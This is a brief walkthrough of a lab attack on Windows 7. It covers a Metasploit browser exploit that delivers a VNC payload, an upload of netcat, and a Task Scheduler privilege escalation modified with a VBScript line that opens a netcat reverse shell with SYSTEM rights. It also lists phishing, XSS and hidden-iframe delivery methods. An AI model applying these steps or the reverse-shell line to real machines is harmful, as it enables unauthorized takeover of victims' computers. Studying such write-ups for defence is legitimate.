Windows 7 – Client Side Attack and Local Privilege Escalation – A client side exploit was prepared using the metasploit framework. Exploit: http://www.exploit-db.com/exploits/16533/
Depending on the attack scenario, payload delivery techniques depend on the targeted user; a link via email, redirection through Cross-Site Scripting, or injection of hidden iframes on compromised websites are some of the viable options. When the target browses to 192.168.203.128:8080, the exploit will run, no other steps necessary after having someone visit the link.
A target is found, the exploit activates, and the VNC payload executes. A VNC window of the victim machine is now running on the attacker’s machine. Whoami and systeminfo command was used to gather information about the target. It seems that the machine is running Windows 7 under a standard low-privileged user named test.
With the information gathered, ftp was utilized to upload two files. First, a windows version of netcat: http://joncraton.org/blog/46/netcat-for-windows and second, a local privilege escalation exploit that might allow for normal users to increase their privileges to that of an administrator.
The target machine is running a Windows version that has a vulnerability that may allow an attacker to gain access to unauthorized privileges. The issue is caused due to the Windows Task Scheduler failing to properly determine certain scheduled tasks’ security context. An exploit was identified and modified to be used on the target machine. The added line of code creates a reverse netcat connection to bypass local firewall restrictions. Exploit: http://www.exploit-db.com/exploits/15589/
Set fso = CreateObject(“Scripting.FileSystemObject”) Set a = fso.CreateTextFile(biatchFile, True) a.WriteLine (“c:\\users\\test\\ncc.exe 192.168.203.128 4444 -e c:\\windows\\system32\\cmd.exe”) a.WriteLine (“schtasks /delete /f /TN wDw00t”)
A listening server on the attacker machine caught the connection request executed from the victim machine resulting in a reverse-shell on the victim machine. And as the connection request was made using the privilege escalation exploit, the resulting shell now has SYSTEM privileges; effectively allowing full control of the machine.The exploit was executed with the command cscript.exe exploit.wsf.